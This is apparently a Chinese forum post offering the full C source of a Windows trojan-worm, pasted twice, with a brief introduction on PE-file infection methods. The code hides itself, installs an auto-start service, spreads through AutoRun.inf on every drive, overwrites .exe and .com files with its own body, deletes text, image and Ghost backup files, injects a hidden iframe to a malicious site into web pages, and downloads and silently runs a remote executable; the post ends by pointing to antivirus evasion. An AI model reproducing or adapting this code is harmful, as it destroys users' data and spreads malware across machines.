通过3天的改写,简单感染PE文件已经完成。
代码中的这种方法只是感染PE文件中的一种
1. 添加空字节感染
2. 插缝
3. 开辟空间,将自身病毒体添加进去
还有很多感染PE文件的方法,这几个只是常用的几种
这次用的是第3中,应该说是最简单最容易写的。
程序代码:// C语言设计简单木马雏形第3篇
// 源代码仅供个人研究安全技术, 如违反法律后果自负
// 用于法律以及商业范围与源代码作者无关
// 作者 : GodOneisCode
// 改写时间 : 2周
#include <Stdio.h> // 用于调用sprintf函数
#include <Winsock2.h> // 后门
#include <Windows.h> // 感染与模拟机器狗病毒
#include <Urlmon.h> // 下载木马并运行
#include <winnt.h>
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "User32.lib");
void HideWindow();
void InfectAllFiles(char *lpPath);
void WormComputer();
void AutoInfect(char *lpPath);
void EnterService();
void CopyFiles(char *lpPath);
void DownFiles(char Url[]);
void DownExec(char url[]);
void PeInfect(char *lpPath);
// 定义Autorun文件内容
char szAutoRun[] = "[AutoRun] \
\r\nopen=SystemInfo.exe \
\r\nshell\\open=打开(&O) \
\r\nshell\\open\\command=SystemInfo.exe \
\r\nshell\\explore=资源管理器(&X) \
\r\nshell\\explore\\command=SystemInfo.exe \
\r\nshellexecute=SystemInfo.exe \
\r\nshell\\auto\\command=SystemInfo.exe";
// 定义恶意网页代码, 跳转恶意网页
char szWebCode[] = "\r\n<iframe src=http://www.xxpapa.co width=0 height=0></iframe> \
\r\n<img src=图片地址></img>";
int main(int argc, char **argv)
{
HideWindow();
EnterService();
WormComputer();
DownFiles("http://www.");
return 0;
}
// 隐藏自身窗口
void HideWindow()
{
HWND hwndDOS = GetForegroundWindow();
ShowWindow(hwndDOS, SW_HIDE);
}
// 实现全盘感染
void WormComputer()
{
for ( char cLabel='C'; cLabel<='Z'; cLabel++ )
{
char strRootPath[] = {"C:\\"};
strRootPath[0] = cLabel;
if ( GetDriveType(strRootPath) == DRIVE_FIXED )
{
strRootPath[2] = '\0';
CopyFiles(strRootPath);
AutoInfect(strRootPath);
InfectAllFiles(strRootPath);
}
}
}
// 复制自身
void CopyFiles(char *lpPath)
{
char szFile[MAX_PATH] = { 0 };
char szCurrDir[MAX_PATH] = { 0 };
strcpy(szFile, lpPath);
strcat(szFile, "\\SystemInfo.exe");
GetModuleFileName(NULL, szCurrDir, MAX_PATH);
CopyFile(szCurrDir, szFile, FALSE);
}
// 传播木马
void AutoInfect(char *lpPath)
{
char szAutoFile[MAX_PATH] = { 0 };
strcpy(szAutoFile, lpPath);
strcat(szAutoFile, "\\AutoRun.inf");
HANDLE hFile = CreateFile(szAutoFile,
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
DWORD dwWritten = 0;
WriteFile(hFile, szAutoRun, lstrlen(szAutoRun),
&dwWritten, NULL);
CloseHandle(hFile);
}
// 遍历目录
void InfectAllFiles(char *lpPath)
{
char szFind[MAX_PATH] = { 0 };
WIN32_FIND_DATA FindFileData;
strcpy(szFind, lpPath);
strcat(szFind, "\\*.*");
HANDLE hFind = ::FindFirstFile(szFind, &FindFileData);
if ( INVALID_HANDLE_VALUE == hFind)
return;
while ( TRUE )
{
if ( FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY )
{
if ( FindFileData.cFileName[0] != '.' )
{
char szFile[MAX_PATH] = { 0 };
strcpy(szFile, lpPath);
strcat(szFile, "\\");
strcat(szFile, FindFileData.cFileName);
InfectAllFiles(szFile);
}
}
else
{
int len = strlen(FindFileData.cFileName);
const char *p = (char *)&FindFileData.cFileName[len-3];
char strFileName[MAX_PATH] = { 0 };
strcpy(strFileName, lpPath);
strcat(strFileName, "\\");
strcat(strFileName, FindFileData.cFileName);
// 感染网页文件
if ( _stricmp(p, "html") == 0 || _stricmp(p, "htm") == 0 || _stricmp(p, "asp") == 0
|| _stricmp(p, "aspx") == 0 || _stricmp(p, "php") == 0 || _stricmp(p, "jsp") == 0 )
{
HANDLE hFile = CreateFile(strFileName,
GENERIC_WRITE,
0, NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
DWORD dwWritten = 0;
WriteFile(hFile, szWebCode, lstrlen(szWebCode),
&dwWritten, NULL);
CloseHandle(hFile);
}
// 删除其他文件
else if ( _stricmp(p, "txt") == 0 || _stricmp(p, "bat") == 0 || _stricmp(p, "dos") == 0
|| _stricmp(p, "jpg") == 0 || _stricmp(p, "gho") == 0 )
{
DeleteFile(strFileName);
}
// 感染可执行文件
else if ( _stricmp(p, "exe") == 0 || _stricmp(p, "com") == 0)
{
PeInfect(strFileName);
}
}
if ( !FindNextFile(hFind, &FindFileData) )
break;
}
FindClose(hFind);
}
// 服务自启动
void EnterService()
{
char szFileName[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szFileName, MAX_PATH);
SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);
if ( scHandleOpen == NULL )
{
char szSelfFile[MAX_PATH] = { 0 };
char szSystemPath[MAX_PATH] = { 0 };
GetWindowsDirectory(szSystemPath, MAX_PATH);
strcat(szSystemPath, "\\SystemInfo.exe");
GetModuleFileName(NULL, szSelfFile, MAX_PATH);
CopyFile(szSelfFile, szSystemPath, FALSE);
SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);
SC_HANDLE scNewHandle = CreateService(scHandle,
"door",
"door",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szSystemPath,
NULL,
NULL,
NULL,
NULL,
NULL);
StartService(scNewHandle, 0, NULL);
CloseServiceHandle(scNewHandle);
}
CloseServiceHandle(scHandleOpen);
CloseServiceHandle(scHandle);
}
// 模拟机器狗
void DownFiles(char Url[])
{
// 由于此代码杀伤力太大,所以不公开代码,邮箱384416968@
}
// 下载木马
void DownExec(char FileUrl[])
{
char SystemBuff[256], File[256];
memset(File, 0, 256);
GetWindowsDirectory(SystemBuff, sizeof(SystemBuff));
sprintf(File, "%s\\Down.exe", SystemBuff);
URLDownloadToFile(0, FileUrl, File, 0, 0);
WinExec(File, SW_HIDE);
}
// 简单感染PE文件
void PeInfect(char *lpPath)
{
HANDLE hFile = NULL;
HANDLE hPeFile = NULL;
DWORD dwSize;
DWORD dwRet = 204800;
BYTE uSize[204800];
// 获取自身路径及名称
TCHAR szFile[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szFile, MAX_PATH);
// 打开自身病毒体
hFile = CreateFile(szFile,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING,
FILE_FLAG_SEQUENTIAL_SCAN,
NULL);
if ( hFile == NULL )
{
return;
}
// 打开目标文件
hPeFile = CreateFile(lpPath,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING,
FILE_FLAG_SEQUENTIAL_SCAN,
NULL);
if ( hPeFile == NULL )
{
return;
}
// 开辟空间大小为204800字节
SetFilePointer(hPeFile, 0, 0, FILE_BEGIN);
ReadFile(hPeFile, uSize, dwRet, &dwSize, NULL);
SetFilePointer(hPeFile, 0, 0, FILE_END);
WriteFile(hPeFile, uSize, dwRet, &dwSize, NULL);
// 读取自身病毒体内容
SetFilePointer(hFile, 0, 0, FILE_BEGIN);
ReadFile(hFile, uSize, dwRet, &dwSize, NULL);
// 感染目标文件
SetFilePointer(hPeFile, 0, 0, FILE_BEGIN);
WriteFile(hPeFile, uSize, dwRet, &dwSize, NULL);
CloseHandle(hFile);
CloseHandle(hPeFile);
}
// 源代码仅供个人研究安全技术, 如违反法律后果自负
// 用于法律以及商业范围与源代码作者无关
// 作者 : GodOneisCode
// 改写时间 : 2周
#include <Stdio.h> // 用于调用sprintf函数
#include <Winsock2.h> // 后门
#include <Windows.h> // 感染与模拟机器狗病毒
#include <Urlmon.h> // 下载木马并运行
#include <winnt.h>
#pragma comment(lib, "Urlmon.lib")
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "User32.lib");
void HideWindow();
void InfectAllFiles(char *lpPath);
void WormComputer();
void AutoInfect(char *lpPath);
void EnterService();
void CopyFiles(char *lpPath);
void DownFiles(char Url[]);
void DownExec(char url[]);
void PeInfect(char *lpPath);
// 定义Autorun文件内容
char szAutoRun[] = "[AutoRun] \
\r\nopen=SystemInfo.exe \
\r\nshell\\open=打开(&O) \
\r\nshell\\open\\command=SystemInfo.exe \
\r\nshell\\explore=资源管理器(&X) \
\r\nshell\\explore\\command=SystemInfo.exe \
\r\nshellexecute=SystemInfo.exe \
\r\nshell\\auto\\command=SystemInfo.exe";
// 定义恶意网页代码, 跳转恶意网页
char szWebCode[] = "\r\n<iframe src=http://www.xxpapa.co width=0 height=0></iframe> \
\r\n<img src=图片地址></img>";
int main(int argc, char **argv)
{
HideWindow();
EnterService();
WormComputer();
DownFiles("http://www.");
return 0;
}
// 隐藏自身窗口
void HideWindow()
{
HWND hwndDOS = GetForegroundWindow();
ShowWindow(hwndDOS, SW_HIDE);
}
// 实现全盘感染
void WormComputer()
{
for ( char cLabel='C'; cLabel<='Z'; cLabel++ )
{
char strRootPath[] = {"C:\\"};
strRootPath[0] = cLabel;
if ( GetDriveType(strRootPath) == DRIVE_FIXED )
{
strRootPath[2] = '\0';
CopyFiles(strRootPath);
AutoInfect(strRootPath);
InfectAllFiles(strRootPath);
}
}
}
// 复制自身
void CopyFiles(char *lpPath)
{
char szFile[MAX_PATH] = { 0 };
char szCurrDir[MAX_PATH] = { 0 };
strcpy(szFile, lpPath);
strcat(szFile, "\\SystemInfo.exe");
GetModuleFileName(NULL, szCurrDir, MAX_PATH);
CopyFile(szCurrDir, szFile, FALSE);
}
// 传播木马
void AutoInfect(char *lpPath)
{
char szAutoFile[MAX_PATH] = { 0 };
strcpy(szAutoFile, lpPath);
strcat(szAutoFile, "\\AutoRun.inf");
HANDLE hFile = CreateFile(szAutoFile,
GENERIC_WRITE,
0, NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
DWORD dwWritten = 0;
WriteFile(hFile, szAutoRun, lstrlen(szAutoRun),
&dwWritten, NULL);
CloseHandle(hFile);
}
// 遍历目录
void InfectAllFiles(char *lpPath)
{
char szFind[MAX_PATH] = { 0 };
WIN32_FIND_DATA FindFileData;
strcpy(szFind, lpPath);
strcat(szFind, "\\*.*");
HANDLE hFind = ::FindFirstFile(szFind, &FindFileData);
if ( INVALID_HANDLE_VALUE == hFind)
return;
while ( TRUE )
{
if ( FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY )
{
if ( FindFileData.cFileName[0] != '.' )
{
char szFile[MAX_PATH] = { 0 };
strcpy(szFile, lpPath);
strcat(szFile, "\\");
strcat(szFile, FindFileData.cFileName);
InfectAllFiles(szFile);
}
}
else
{
int len = strlen(FindFileData.cFileName);
const char *p = (char *)&FindFileData.cFileName[len-3];
char strFileName[MAX_PATH] = { 0 };
strcpy(strFileName, lpPath);
strcat(strFileName, "\\");
strcat(strFileName, FindFileData.cFileName);
// 感染网页文件
if ( _stricmp(p, "html") == 0 || _stricmp(p, "htm") == 0 || _stricmp(p, "asp") == 0
|| _stricmp(p, "aspx") == 0 || _stricmp(p, "php") == 0 || _stricmp(p, "jsp") == 0 )
{
HANDLE hFile = CreateFile(strFileName,
GENERIC_WRITE,
0, NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
DWORD dwWritten = 0;
WriteFile(hFile, szWebCode, lstrlen(szWebCode),
&dwWritten, NULL);
CloseHandle(hFile);
}
// 删除其他文件
else if ( _stricmp(p, "txt") == 0 || _stricmp(p, "bat") == 0 || _stricmp(p, "dos") == 0
|| _stricmp(p, "jpg") == 0 || _stricmp(p, "gho") == 0 )
{
DeleteFile(strFileName);
}
// 感染可执行文件
else if ( _stricmp(p, "exe") == 0 || _stricmp(p, "com") == 0)
{
PeInfect(strFileName);
}
}
if ( !FindNextFile(hFind, &FindFileData) )
break;
}
FindClose(hFind);
}
// 服务自启动
void EnterService()
{
char szFileName[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szFileName, MAX_PATH);
SC_HANDLE scHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE scHandleOpen = OpenService(scHandle, "door", SERVICE_ALL_ACCESS);
if ( scHandleOpen == NULL )
{
char szSelfFile[MAX_PATH] = { 0 };
char szSystemPath[MAX_PATH] = { 0 };
GetWindowsDirectory(szSystemPath, MAX_PATH);
strcat(szSystemPath, "\\SystemInfo.exe");
GetModuleFileName(NULL, szSelfFile, MAX_PATH);
CopyFile(szSelfFile, szSystemPath, FALSE);
SetFileAttributes(szSystemPath, FILE_ATTRIBUTE_HIDDEN);
SC_HANDLE scNewHandle = CreateService(scHandle,
"door",
"door",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szSystemPath,
NULL,
NULL,
NULL,
NULL,
NULL);
StartService(scNewHandle, 0, NULL);
CloseServiceHandle(scNewHandle);
}
CloseServiceHandle(scHandleOpen);
CloseServiceHandle(scHandle);
}
// 模拟机器狗
void DownFiles(char Url[])
{
// 由于此代码杀伤力太大,所以不公开代码,邮箱384416968@
}
// 下载木马
void DownExec(char FileUrl[])
{
char SystemBuff[256], File[256];
memset(File, 0, 256);
GetWindowsDirectory(SystemBuff, sizeof(SystemBuff));
sprintf(File, "%s\\Down.exe", SystemBuff);
URLDownloadToFile(0, FileUrl, File, 0, 0);
WinExec(File, SW_HIDE);
}
// 简单感染PE文件
void PeInfect(char *lpPath)
{
HANDLE hFile = NULL;
HANDLE hPeFile = NULL;
DWORD dwSize;
DWORD dwRet = 204800;
BYTE uSize[204800];
// 获取自身路径及名称
TCHAR szFile[MAX_PATH] = { 0 };
GetModuleFileName(NULL, szFile, MAX_PATH);
// 打开自身病毒体
hFile = CreateFile(szFile,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING,
FILE_FLAG_SEQUENTIAL_SCAN,
NULL);
if ( hFile == NULL )
{
return;
}
// 打开目标文件
hPeFile = CreateFile(lpPath,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, OPEN_EXISTING,
FILE_FLAG_SEQUENTIAL_SCAN,
NULL);
if ( hPeFile == NULL )
{
return;
}
// 开辟空间大小为204800字节
SetFilePointer(hPeFile, 0, 0, FILE_BEGIN);
ReadFile(hPeFile, uSize, dwRet, &dwSize, NULL);
SetFilePointer(hPeFile, 0, 0, FILE_END);
WriteFile(hPeFile, uSize, dwRet, &dwSize, NULL);
// 读取自身病毒体内容
SetFilePointer(hFile, 0, 0, FILE_BEGIN);
ReadFile(hFile, uSize, dwRet, &dwSize, NULL);
// 感染目标文件
SetFilePointer(hPeFile, 0, 0, FILE_BEGIN);
WriteFile(hPeFile, uSize, dwRet, &dwSize, NULL);
CloseHandle(hFile);
CloseHandle(hPeFile);
}
木马基本完结,如果要免杀还需要许多方面的考虑,例如绕过主动防御,加壳,修改特征码等。